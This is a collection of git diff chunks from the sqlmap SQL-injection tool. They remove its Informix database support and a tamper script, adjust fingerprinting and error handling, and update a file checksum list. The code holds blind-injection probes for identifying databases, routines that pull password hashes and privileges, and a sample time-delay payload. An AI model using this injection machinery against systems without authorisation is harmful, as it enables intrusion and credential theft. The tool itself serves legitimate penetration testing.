from lib.core.data import conf
from lib.core.data import logger
from lib.core.exception import SqlmapConnectionException
from plugins.generic.connector import Connector as GenericConnector
class Connector(GenericConnector):
"""
Homepage: http://code.google.com/p/ibm-db/
User guide: http://code.google.com/p/ibm-db/wiki/README
API: http://www.python.org/dev/peps/pep-0249/
License: Apache License 2.0
"""
def __init__(self):
GenericConnector.__init__(self)
def connect(self):
self.initConnection()
try:
database = "DATABASE=%s;HOSTNAME=%s;PORT=%s;PROTOCOL=TCPIP;" % (self.db, self.hostname, self.port)
self.connector = ibm_db_dbi.connect(database, self.user, self.password)
except ibm_db_dbi.OperationalError, msg:
raise SqlmapConnectionException(msg)
self.initCursor()
self.printConnected()
def fetchall(self):
try:
return self.cursor.fetchall()
except ibm_db_dbi.ProgrammingError, msg:
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
return None
def execute(self, query):
try:
self.cursor.execute(query)
except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError), msg:
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
except ibm_db_dbi.InternalError, msg:
raise SqlmapConnectionException(msg[1])
self.connector.commit()
def select(self, query):
self.execute(query)
return self.fetchall()

View File

@@ -1,12 +0,0 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from plugins.generic.enumeration import Enumeration as GenericEnumeration
class Enumeration(GenericEnumeration):
def __init__(self):
GenericEnumeration.__init__(self)

View File

@@ -1,12 +0,0 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem):
def __init__(self):
GenericFilesystem.__init__(self)

View File

@@ -1,105 +0,0 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.common import Backend
from lib.core.common import Format
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.session import setDbms
from lib.core.settings import INFORMIX_ALIASES
from lib.request import inject
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
class Fingerprint(GenericFingerprint):
def __init__(self):
GenericFingerprint.__init__(self, DBMS.INFORMIX)
def getFingerprint(self):
value = ""
wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
value += "back-end DBMS: "
if not conf.extensiveFp:
value += DBMS.INFORMIX
return value
actVer = Format.getDbms()
blank = " " * 15
value += "active fingerprint: %s" % actVer
if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None
banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
return value
def checkDbms(self):
if not conf.extensiveFp and (Backend.isDbmsWithin(INFORMIX_ALIASES) or (conf.dbms or "").lower() in INFORMIX_ALIASES):
setDbms(DBMS.INFORMIX)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.INFORMIX
logger.info(infoMsg)
result = inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM SYSMASTER:SYSDUAL)")
if result:
infoMsg = "confirming %s" % DBMS.INFORMIX
logger.info(infoMsg)
result = inject.checkBooleanExpression("(SELECT DBINFO('DBNAME') FROM SYSMASTER:SYSDUAL) IS NOT NULL")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.INFORMIX
logger.warn(warnMsg)
return False
setDbms(DBMS.INFORMIX)
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.INFORMIX
logger.info(infoMsg)
for version in ("12.1", "11.7", "11.5"):
output = inject.checkBooleanExpression("EXISTS(SELECT 1 FROM SYSMASTER:SYSDUAL WHERE DBINFO('VERSION','FULL') LIKE '%%%s%%')" % version)
if output:
Backend.setVersion(version)
break
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.INFORMIX
logger.warn(warnMsg)
return False

View File

@@ -1,24 +0,0 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from plugins.generic.syntax import Syntax as GenericSyntax
class Syntax(GenericSyntax):
def __init__(self):
GenericSyntax.__init__(self)
@staticmethod
def escape(expression, quote=True):
"""
>>> Syntax.escape("SELECT 'abcdefgh' FROM foobar")
'SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar'
"""
def escaper(value):
return "||".join("CHR(%d)" % ord(_) for _ in value)
return Syntax._escape(expression, quote, escaper)

View File

@@ -1,15 +0,0 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from plugins.generic.takeover import Takeover as GenericTakeover
class Takeover(GenericTakeover):
def __init__(self):
self.__basedir = None
self.__datadir = None
GenericTakeover.__init__(self)

View File

@@ -49,9 +49,9 @@ class Fingerprint(GenericFingerprint):
(50000, 50092), # MySQL 5.0
(50100, 50172), # MySQL 5.1
(50400, 50404), # MySQL 5.4
(50500, 50552), # MySQL 5.5
(50600, 50633), # MySQL 5.6
(50700, 50715), # MySQL 5.7
(50500, 50549), # MySQL 5.5
(50600, 50630), # MySQL 5.6
(50700, 50712), # MySQL 5.7
(60000, 60014), # MySQL 6.0
)

View File

@@ -97,16 +97,8 @@ class Fingerprint(GenericFingerprint):
infoMsg = "actively fingerprinting %s" % DBMS.PGSQL
logger.info(infoMsg)
if inject.checkBooleanExpression("TO_JSONB(1) IS NOT NULL"):
Backend.setVersion(">= 9.5.0")
elif inject.checkBooleanExpression("JSON_TYPEOF(NULL) IS NULL"):
Backend.setVersionList([">= 9.4.0", "< 9.5.0"])
elif inject.checkBooleanExpression("ARRAY_REPLACE(NULL,1,1) IS NULL"):
Backend.setVersionList([">= 9.3.0", "< 9.4.0"])
elif inject.checkBooleanExpression("ROW_TO_JSON(NULL) IS NULL"):
Backend.setVersionList([">= 9.2.0", "< 9.3.0"])
elif inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"):
Backend.setVersionList([">= 9.1.0", "< 9.2.0"])
if inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"):
Backend.setVersion(">= 9.1.0")
elif inject.checkBooleanExpression("LENGTH(TO_CHAR(1,'EEEE'))>0"):
Backend.setVersionList([">= 9.0.0", "< 9.1.0"])
elif inject.checkBooleanExpression("2=(SELECT DIV(6,3))"):

View File

@@ -32,7 +32,6 @@ from lib.core.data import logger
from lib.core.data import paths
from lib.core.data import queries
from lib.core.dicts import FIREBIRD_TYPES
from lib.core.dicts import INFORMIX_TYPES
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
@@ -336,7 +335,7 @@ class Databases:
query = rootQuery.blind.query % (kb.data.cachedTables[-1] if kb.data.cachedTables else " ")
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD):
query = rootQuery.blind.query % index
elif Backend.getIdentifiedDbms() in (DBMS.HSQLDB, DBMS.INFORMIX):
elif Backend.isDbms(DBMS.HSQLDB):
query = rootQuery.blind.query % (index, unsafeSQLIdentificatorNaming(db))
else:
query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(db), index)
@@ -604,17 +603,8 @@ class Databases:
if len(columnData) == 1:
columns[name] = None
else:
key = int(columnData[1]) if isinstance(columnData[1], basestring) and columnData[1].isdigit() else columnData[1]
if Backend.isDbms(DBMS.FIREBIRD):
columnData[1] = FIREBIRD_TYPES.get(key, columnData[1])
elif Backend.isDbms(DBMS.INFORMIX):
notNull = False
if isinstance(key, int) and key > 255:
key -= 256
notNull = True
columnData[1] = INFORMIX_TYPES.get(key, columnData[1])
if notNull:
columnData[1] = "%s NOT NULL" % columnData[1]
columnData[1] = FIREBIRD_TYPES.get(int(columnData[1]) if isinstance(columnData[1], basestring) and columnData[1].isdigit() else columnData[1], columnData[1])
columns[name] = columnData[1]
@@ -666,10 +656,6 @@ class Databases:
query = rootQuery.blind.count % (tbl)
query += condQuery
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.count % (conf.db, conf.db, conf.db, conf.db, conf.db, tbl)
query += condQuery
elif Backend.isDbms(DBMS.SQLITE):
query = rootQuery.blind.query % tbl
value = unArrayizeValue(inject.getValue(query, union=False, error=False))
@@ -726,10 +712,6 @@ class Databases:
query = rootQuery.blind.query % (tbl)
query += condQuery
field = None
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.query % (index, conf.db, conf.db, conf.db, conf.db, conf.db, tbl)
query += condQuery
field = condition
query = agent.limitQuery(index, query, field, field)
column = unArrayizeValue(inject.getValue(query, union=False, error=False))
@@ -762,22 +744,11 @@ class Databases:
conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
elif Backend.isDbms(DBMS.FIREBIRD):
query = rootQuery.blind.query2 % (tbl, column)
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, conf.db, tbl, column)
colType = unArrayizeValue(inject.getValue(query, union=False, error=False))
key = int(colType) if isinstance(colType, basestring) and colType.isdigit() else colType
if Backend.isDbms(DBMS.FIREBIRD):
colType = FIREBIRD_TYPES.get(key, colType)
elif Backend.isDbms(DBMS.INFORMIX):
notNull = False
if isinstance(key, int) and key > 255:
key -= 256
notNull = True
colType = INFORMIX_TYPES.get(key, colType)
if notNull:
colType = "%s NOT NULL" % colType
colType = FIREBIRD_TYPES.get(colType, colType)
column = safeSQLIdentificatorNaming(column)
columns[column] = colType

View File

@@ -110,10 +110,7 @@ class Entries:
kb.data.cachedColumns = foundData
try:
if Backend.isDbms(DBMS.INFORMIX):
kb.dumpTable = "%s:%s" % (conf.db, tbl)
else:
kb.dumpTable = "%s.%s" % (conf.db, tbl)
kb.dumpTable = "%s.%s" % (conf.db, tbl)
if not safeSQLIdentificatorNaming(conf.db) in kb.data.cachedColumns \
or safeSQLIdentificatorNaming(tbl, True) not in \
@@ -239,8 +236,6 @@ class Entries:
query = rootQuery.blind.count % ("%s.%s" % (conf.db, tbl))
elif Backend.isDbms(DBMS.MAXDB):
query = rootQuery.blind.count % tbl
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.count % (conf.db, tbl)
else:
query = rootQuery.blind.count % (conf.db, tbl)
@@ -321,13 +316,14 @@ class Entries:
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index)
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), index)
query = rootQuery.blind.query % (agent.preprocessField(tbl, column),
tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())),
index)
elif Backend.isDbms(DBMS.SQLITE):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl, index)
elif Backend.isDbms(DBMS.FIREBIRD):
query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), tbl)
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), conf.db, tbl, sorted(colList, key=len)[0])
query = whereQuery(query)

View File

@@ -27,11 +27,10 @@ from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.dicts import DB2_PRIVS
from lib.core.dicts import FIREBIRD_PRIVS
from lib.core.dicts import INFORMIX_PRIVS
from lib.core.dicts import MYSQL_PRIVS
from lib.core.dicts import PGSQL_PRIVS
from lib.core.dicts import FIREBIRD_PRIVS
from lib.core.dicts import DB2_PRIVS
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
@@ -252,25 +251,22 @@ class Users:
if user in retrievedUsers:
continue
if Backend.isDbms(DBMS.INFORMIX):
count = 1
infoMsg = "fetching number of password hashes "
infoMsg += "for user '%s'" % user
logger.info(infoMsg)
if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
query = rootQuery.blind.count2 % user
else:
infoMsg = "fetching number of password hashes "
infoMsg += "for user '%s'" % user
logger.info(infoMsg)
query = rootQuery.blind.count % user
if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
query = rootQuery.blind.count2 % user
else:
query = rootQuery.blind.count % user
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count):
warnMsg = "unable to retrieve the number of password "
warnMsg += "hashes for user '%s'" % user
logger.warn(warnMsg)
continue
if not isNumPosStrValue(count):
warnMsg = "unable to retrieve the number of password "
warnMsg += "hashes for user '%s'" % user
logger.warn(warnMsg)
continue
infoMsg = "fetching password hashes for user '%s'" % user
logger.info(infoMsg)
@@ -286,14 +282,11 @@ class Users:
query = rootQuery.blind.query2 % (user, index, user)
else:
query = rootQuery.blind.query % (user, index, user)
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.query % (user,)
else:
query = rootQuery.blind.query % (user, index)
password = unArrayizeValue(inject.getValue(query, union=False, error=False))
password = parsePasswordHash(password)
passwords.append(password)
if passwords:
@@ -477,35 +470,32 @@ class Users:
if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
user = "%%%s%%" % user
if Backend.isDbms(DBMS.INFORMIX):
count = 1
infoMsg = "fetching number of privileges "
infoMsg += "for user '%s'" % outuser
logger.info(infoMsg)
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
query = rootQuery.blind.count2 % user
elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
query = rootQuery.blind.count % (conditionChar, user)
elif Backend.isDbms(DBMS.ORACLE) and query2:
query = rootQuery.blind.count2 % user
else:
infoMsg = "fetching number of privileges "
infoMsg += "for user '%s'" % outuser
logger.info(infoMsg)
query = rootQuery.blind.count % user
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
query = rootQuery.blind.count2 % user
elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
query = rootQuery.blind.count % (conditionChar, user)
elif Backend.isDbms(DBMS.ORACLE) and query2:
query = rootQuery.blind.count2 % user
else:
query = rootQuery.blind.count % user
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count):
if not retrievedUsers and Backend.isDbms(DBMS.ORACLE) and not query2:
infoMsg = "trying with table USER_SYS_PRIVS"
logger.info(infoMsg)
if not isNumPosStrValue(count):
if not retrievedUsers and Backend.isDbms(DBMS.ORACLE) and not query2:
infoMsg = "trying with table USER_SYS_PRIVS"
logger.info(infoMsg)
return self.getPrivileges(query2=True)
return self.getPrivileges(query2=True)
warnMsg = "unable to retrieve the number of "
warnMsg += "privileges for user '%s'" % outuser
logger.warn(warnMsg)
continue
warnMsg = "unable to retrieve the number of "
warnMsg += "privileges for user '%s'" % outuser
logger.warn(warnMsg)
continue
infoMsg = "fetching privileges for user '%s'" % outuser
logger.info(infoMsg)
@@ -524,8 +514,6 @@ class Users:
query = rootQuery.blind.query2 % (user, index)
elif Backend.isDbms(DBMS.FIREBIRD):
query = rootQuery.blind.query % (index, user)
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.query % (user,)
else:
query = rootQuery.blind.query % (user, index)
@@ -573,10 +561,6 @@ class Users:
elif Backend.isDbms(DBMS.FIREBIRD):
privileges.add(FIREBIRD_PRIVS[privilege.strip()])
# In Informix we get one letter for the highest privilege
elif Backend.isDbms(DBMS.INFORMIX):
privileges.add(INFORMIX_PRIVS[privilege.strip()])
# In DB2 we get Y or G if the privilege is
# True, N otherwise
elif Backend.isDbms(DBMS.DB2):

View File

@@ -63,6 +63,8 @@ try:
from lib.core.testing import smokeTest
from lib.core.testing import liveTest
from lib.parse.cmdline import cmdLineParser
from lib.utils.api import setRestAPILog
from lib.utils.api import StdDbOut
except KeyboardInterrupt:
errMsg = "user aborted"
logger.error(errMsg)
@@ -99,15 +101,6 @@ def checkEnvironment():
logger.critical(errMsg)
raise SystemExit
# Patch for pip (import) environment
if "sqlmap.sqlmap" in sys.modules:
for _ in ("cmdLineOptions", "conf", "kb"):
globals()[_] = getattr(sys.modules["lib.core.data"], _)
for _ in ("SqlmapBaseException", "SqlmapShellQuitException", "SqlmapSilentQuitException", "SqlmapUserQuitException"):
globals()[_] = getattr(sys.modules["lib.core.exception"], _)
def main():
"""
Main function of sqlmap when running from command line.
@@ -124,10 +117,6 @@ def main():
initOptions(cmdLineOptions)
if hasattr(conf, "api"):
# heavy imports
from lib.utils.api import StdDbOut
from lib.utils.api import setRestAPILog
# Overwrite system standard output and standard error to write
# to an IPC database
sys.stdout = StdDbOut(conf.taskid, messagetype="stdout")
@@ -206,19 +195,13 @@ def main():
try:
if not checkIntegrity():
errMsg = "code integrity check failed (turning off automatic issue creation). "
errMsg = "code integrity check failed. "
errMsg += "You should retrieve the latest development version from official GitHub "
errMsg += "repository at '%s'" % GIT_PAGE
logger.critical(errMsg)
print
dataToStdout(excMsg)
raise SystemExit
elif "MemoryError" in excMsg:
errMsg = "memory exhaustion detected"
logger.error(errMsg)
raise SystemExit
elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded")):
errMsg = "no space left on output device"
logger.error(errMsg)
@@ -236,11 +219,6 @@ def main():
logger.error(errMsg)
raise SystemExit
elif "OperationalError: disk I/O error" in excMsg:
errMsg = "I/O error on output device"
logger.error(errMsg)
raise SystemExit
elif "_mkstemp_inner" in excMsg:
errMsg = "there has been a problem while accessing temporary files"
logger.error(errMsg)
@@ -322,7 +300,7 @@ def main():
if hasattr(conf, "api"):
try:
conf.databaseCursor.disconnect()
conf.database_cursor.disconnect()
except KeyboardInterrupt:
pass
@@ -336,10 +314,10 @@ def main():
time.sleep(0.01)
except KeyboardInterrupt:
pass
finally:
# Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program
if threading.activeCount() > 1:
os._exit(0)
# Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program
if threading.activeCount() > 1:
os._exit(0)
if __name__ == "__main__":
main()

View File

@@ -1,25 +0,0 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):
"""
HTML encode (using code points) all non-alphanumeric characters
>>> tamper("1' AND SLEEP(5)#")
'1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;'
"""
return re.sub(r"[^\w]", lambda match: "&#%d;" % ord(match.group(0)), payload) if payload else payload
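
The tamper above is self-contained enough to try outside sqlmap; the sketch below is an assumed-standalone reproduction of its docstring example, run without the tamper-script loader.

# Illustrative sketch only -- the same substitution as tamper() above,
# runnable without sqlmap's plugin machinery.
import re

def html_encode_non_alphanumerics(payload):
    return re.sub(r"[^\w]", lambda m: "&#%d;" % ord(m.group(0)), payload) if payload else payload

print(html_encode_non_alphanumerics("1' AND SLEEP(5)#"))
# 1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;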

View File

@@ -1142,7 +1142,7 @@ def _ParseFileEx(file, base_uri,
try:
form.fixup()
except AttributeError, ex:
if not any(_ in str(ex) for _ in ("is disabled", "is readonly")):
if not any(_ in str(ex) for _ in ("item is disabled", "is readonly")):
raise
return forms

View File

@@ -47,13 +47,13 @@ class MultipartPostHandler(urllib2.BaseHandler):
def http_request(self, request):
data = request.get_data()
if isinstance(data, dict):
if data is not None and type(data) != str:
v_files = []
v_vars = []
try:
for(key, value) in data.items():
if isinstance(value, file) or hasattr(value, "file") or isinstance(value, StringIO.StringIO):
if isinstance(value, file) or hasattr(value, 'file') or isinstance(value, StringIO.StringIO):
v_files.append((key, value))
else:
v_vars.append((key, value))
@@ -65,10 +65,10 @@ class MultipartPostHandler(urllib2.BaseHandler):
data = urllib.urlencode(v_vars, doseq)
else:
boundary, data = self.multipart_encode(v_vars, v_files)
contenttype = "multipart/form-data; boundary=%s" % boundary
#if (request.has_header("Content-Type") and request.get_header("Content-Type").find("multipart/form-data") != 0):
# print "Replacing %s with %s" % (request.get_header("content-type"), "multipart/form-data")
request.add_unredirected_header("Content-Type", contenttype)
contenttype = 'multipart/form-data; boundary=%s' % boundary
#if (request.has_header('Content-Type') and request.get_header('Content-Type').find('multipart/form-data') != 0):
# print "Replacing %s with %s" % (request.get_header('content-type'), 'multipart/form-data')
request.add_unredirected_header('Content-Type', contenttype)
request.add_data(data)
return request
@@ -78,32 +78,32 @@ class MultipartPostHandler(urllib2.BaseHandler):
boundary = mimetools.choose_boundary()
if buf is None:
buf = ""
buf = ''
for (key, value) in vars:
if key is not None and value is not None:
buf += "--%s\r\n" % boundary
buf += "Content-Disposition: form-data; name=\"%s\"" % key
buf += "\r\n\r\n" + value + "\r\n"
buf += '--%s\r\n' % boundary
buf += 'Content-Disposition: form-data; name="%s"' % key
buf += '\r\n\r\n' + value + '\r\n'
for (key, fd) in files:
file_size = os.fstat(fd.fileno())[stat.ST_SIZE] if isinstance(fd, file) else fd.len
filename = fd.name.split("/")[-1] if "/" in fd.name else fd.name.split("\\")[-1]
filename = fd.name.split('/')[-1] if '/' in fd.name else fd.name.split('\\')[-1]
try:
contenttype = mimetypes.guess_type(filename)[0] or "application/octet-stream"
contenttype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
except:
# Reference: http://bugs.python.org/issue9291
contenttype = "application/octet-stream"
buf += "--%s\r\n" % boundary
buf += "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"\r\n" % (key, filename)
buf += "Content-Type: %s\r\n" % contenttype
# buf += "Content-Length: %s\r\n" % file_size
contenttype = 'application/octet-stream'
buf += '--%s\r\n' % boundary
buf += 'Content-Disposition: form-data; name="%s"; filename="%s"\r\n' % (key, filename)
buf += 'Content-Type: %s\r\n' % contenttype
# buf += 'Content-Length: %s\r\n' % file_size
fd.seek(0)
buf = str(buf) if not isinstance(buf, unicode) else buf.encode("utf8")
buf += "\r\n%s\r\n" % fd.read()
buf += '\r\n%s\r\n' % fd.read()
buf += "--%s--\r\n\r\n" % boundary
buf += '--%s--\r\n\r\n' % boundary
return boundary, buf

View File

@@ -10,7 +10,7 @@ acba8b5dc93db0fe6b2b04ff0138c33c extra/icmpsh/icmpsh.exe_
cc9c82cfffd8ee9b25ba3af6284f057e extra/__init__.py
2237d0568236c354b0436d2cd9434f97 extra/mssqlsig/update.py
cc9c82cfffd8ee9b25ba3af6284f057e extra/safe2bin/__init__.py
a54bde99fd05fdb412cba5a8780f3e18 extra/safe2bin/safe2bin.py
cc5b67714d8a0b6b81d29a4f15634c16 extra/safe2bin/safe2bin.py
d229479d02d21b29f209143cb0547780 extra/shellcodeexec/linux/shellcodeexec.x32_
2fe2f94eebc62f7614f0391a8a90104f extra/shellcodeexec/linux/shellcodeexec.x64_
c55b400b72acc43e0e59c87dd8bb8d75 extra/shellcodeexec/windows/shellcodeexec.x32.exe_
@@ -19,58 +19,59 @@ b46521e29ea3d813bab5aeb16cac6498 extra/shutils/duplicates.py
05615626222060120450518136b14ba9 extra/shutils/regressiontest.py
cc9c82cfffd8ee9b25ba3af6284f057e extra/sqlharvest/__init__.py
4f2f817596540d82f9fcc0c5b2228beb extra/sqlharvest/sqlharvest.py
2daa39e4d59526acb4772b6c47eb315f lib/controller/action.py
66cddf7f40c002d663d4401a440ec1aa lib/controller/checks.py
242eb9edf447e09fa3f5d154495308e6 lib/controller/controller.py
0a64305c3b3a01a2fc3a5e6204f442f1 lib/controller/handler.py
b704c0f943c015f6247cfae20048ae8e lib/controller/action.py
d1451b43f3ac80bfbea8657e288865f8 lib/controller/checks.py
7c5ba631796f12d6de9b667e4cc7812b lib/controller/controller.py
5ae8f657fd4e8026fcc9624f5b5533fe lib/controller/handler.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/controller/__init__.py
04f16204c899438dc7599a9a8426bfee lib/core/agent.py
2689f320908964b2c88a3eb8265fd2dd lib/core/agent.py
eb0bd28b0bd9fbf67dcc3119116df377 lib/core/bigarray.py
b1e2ccdeea8bf12feb839d403dc05796 lib/core/common.py
1dd298ac06c961037bb76a675bb4b322 lib/core/common.py
5680d0c446a3bed5c0f2a0402d031557 lib/core/convert.py
e77cca1cb063016f71f6e6bdebf4ec73 lib/core/data.py
1d042f0bc0557d3fd564ea5a46deb77e lib/core/datatype.py
e4ca0fd47f20cf7ba6a5f5cbf980073c lib/core/decorators.py
67f206cf2658145992cc1d7020138325 lib/core/defaults.py
439cae0904cf3db20d1bc81d56980a21 lib/core/dicts.py
4a16002c5d9cd047c2e89ddc5db63737 lib/core/dicts.py
1f98d3f57ce21d625fd67adb26cfd13c lib/core/dump.py
1128705f593013359497b3959078b650 lib/core/enums.py
34a45b9bc68a6381247a620ddf30de1c lib/core/enums.py
e4aec2b11c1ad6039d0c3dbbfbc5eb1a lib/core/exception.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/core/__init__.py
91c514013daa796e2cdd940389354eac lib/core/log.py
5b079749c50240602ea92637e268ed31 lib/core/optiondict.py
16d9e1100189966d8a2224d23fcd2ca2 lib/core/option.py
b9779615206791e6ebbaa84947842b49 lib/core/optiondict.py
85b144015724e1961e6c9ea1a42b329a lib/core/option.py
1e8948dddbd12def5c2af52530738059 lib/core/profiling.py
e60456db5380840a586654344003d4e6 lib/core/readlineng.py
5ef56abb8671c2ca6ceecb208258e360 lib/core/replication.py
99a2b496b9d5b546b335653ca801153f lib/core/revision.py
7c15dd2777af4dac2c89cab6df17462e lib/core/session.py
1d029b393fe525c9ad1ecac20b064ca5 lib/core/settings.py
1a0fab09e6840a52bdfec892fbd9ee53 lib/core/settings.py
7af83e4f18cab6dff5e67840eb65be80 lib/core/shell.py
23657cd7d924e3c6d225719865855827 lib/core/subprocessng.py
c3ace7874a536d801f308cf1fd03df99 lib/core/target.py
d43f059747ffd48952922c94152e2a07 lib/core/testing.py
2cafee22d9f8018e7efff0a5e3178596 lib/core/threads.py
0bc2fae1dec18cdd11954b22358293f2 lib/core/target.py
21b9aa385c851a4e8faaff9b985e29b8 lib/core/testing.py
424a6cf9bdfaf7182657ed7929d7df5a lib/core/threads.py
53c15b78e0288274f52410db25406432 lib/core/unescaper.py
6bdc53e2ca152ff8cd35ad671e48a96b lib/core/update.py
8485a3cd94c0a5af2718bad60c5f1ae5 lib/core/wordlist.py
354ecc0c6d3e0ac9c06ed897c4d52edf lib/core/xmldump.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/__init__.py
c1288bc4ce5651dbdd82d4a9435fdc03 lib/parse/banner.py
bc8a27a451d988398d7e25a786b2c8a2 lib/parse/cmdline.py
bf7fbfb04d6150d19ecfd9b25ee5618a lib/parse/cmdline.py
8ec4d4f02634834701f8258726f2e511 lib/parse/configfile.py
fe4e2152292587928edb94c9a4d311ff lib/parse/handler.py
8e6bfb13e5a34b2610f3ff23467a34cf lib/parse/headers.py
cfa7b4c52915e1d7d59409ed49f0e623 lib/parse/html.py
c8e14fbfc6616d8149b2603c97abec84 lib/parse/html.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/parse/__init__.py
af6b8e1c6eb074b56bbd9cd80aebcd97 lib/parse/payloads.py
b40a4c5d91770d347df36d3065b63798 lib/parse/sitemap.py
9299f21804033f099681525bb9bf51c0 lib/request/basicauthhandler.py
083e7f446909b12009e72ae8e5e5737c lib/request/basic.py
c48285682a61d49982cb508351013cb4 lib/request/comparison.py
3b35467cd761ed53dfb35a85d8d6590d lib/request/connect.py
a3e83cfe7e6825fb1b70951ad290d2ae lib/request/basic.py
9d757c63413a15222af90d3648de9de3 lib/request/comparison.py
72a0e7bb1010bb39c6538dbc77eae180 lib/request/connect.py
49b4c583af68689de5f9acb162de2939 lib/request/direct.py
1a46f7bb26b23ec0c0d9d9c95828241b lib/request/dns.py
70ceefe39980611494d4f99afb96f652 lib/request/httpshandler.py
567656470d23a42ab57ec55a03989dbb lib/request/httpshandler.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/request/__init__.py
aa155f8b27d56485d3ff15efa5e1b07a lib/request/inject.py
3fc323d525beddd14cd4d4dca4934fa8 lib/request/methodrequest.py
@@ -81,12 +82,12 @@ b2ffd261947994f4a4af555d468b4970 lib/request/rangehandler.py
937b7e276f25ccac5a2ac0bf9b1ef434 lib/takeover/abstraction.py
3ecf028d8d93025d2a12c6f6fc13adb2 lib/takeover/icmpsh.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/takeover/__init__.py
